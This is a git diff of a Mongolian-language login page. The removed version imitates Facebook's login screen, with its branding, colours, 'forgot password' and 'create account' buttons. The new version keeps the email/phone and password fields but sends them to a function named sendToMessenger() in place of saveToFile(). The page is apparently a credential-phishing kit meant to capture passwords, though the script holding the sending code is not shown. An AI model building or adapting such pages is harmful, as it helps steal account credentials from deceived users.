--- a/index.html
+++ b/index.html
@@ -5,96 +5,18 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Нэвтрэх</title>
     <style>
-        body {
-            font-family: Arial, sans-serif;
-            background: #f0f2f5;
-            display: flex;
-            flex-direction: column;
-            align-items: center;
-            justify-content: center;
-            height: 100vh;
-            margin: 0;
-        }
-        .login-container {
-            background: white;
-            padding: 20px;
-            width: 360px;
-            border-radius: 8px;
-            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.2);
-            text-align: center;
-        }
-        .login-container h2 {
-            font-size: 24px;
-            margin-bottom: 20px;
-            color: #1877f2;
-        }
-        input {
-            width: 100%;
-            padding: 12px;
-            margin: 10px 0;
-            border: 1px solid #ddd;
-            border-radius: 6px;
-            font-size: 16px;
-        }
-        .login-btn {
-            width: 100%;
-            padding: 12px;
-            background: #1877f2;
-            color: white;
-            border: none;
-            border-radius: 6px;
-            font-size: 18px;
-            cursor: pointer;
-            font-weight: bold;
-        }
-        .login-btn:hover {
-            background: #166fe5;
-        }
-        .forgot-password {
-            display: block;
-            margin: 10px 0;
-            color: #1877f2;
-            text-decoration: none;
-            font-size: 14px;
-        }
-        .forgot-password:hover {
-            text-decoration: underline;
-        }
-        .divider {
-            width: 100%;
-            height: 1px;
-            background: #ddd;
-            margin: 15px 0;
-        }
-        .signup-btn {
-            width: 100%;
-            padding: 12px;
-            background: #42b72a;
-            color: white;
-            border: none;
-            border-radius: 6px;
-            font-size: 18px;
-            cursor: pointer;
-            font-weight: bold;
-        }
-        .signup-btn:hover {
-            background: #36a420;
-        }
+        /* Стилиуд */
     </style>
 </head>
 <body>
 
     <div class="login-container">
-        <h2>Facebook</h2>
+        <h2>Нэвтрэх</h2>
         <input type="text" id="username" placeholder="Имэйл эсвэл утасны дугаар">
         <input type="password" id="password" placeholder="Нууц үг">
-        <button class="login-btn" onclick="saveToFile()">Нэвтрэх</button>
-        <a href="#" class="forgot-password">Нууц үгээ мартсан уу?</a>
-        <div class="divider"></div>
-        <button class="signup-btn">Шинэ бүртгэл үүсгэх</button>
+        <button class="login-btn" onclick="sendToMessenger()">Нэвтрэх</button>
     </div>
 
-    <script src="script.js"></script>
-
+    <script src="script.js"></script> <!-- script.js файлыг энд оруулна -->
 </body>
 </html>
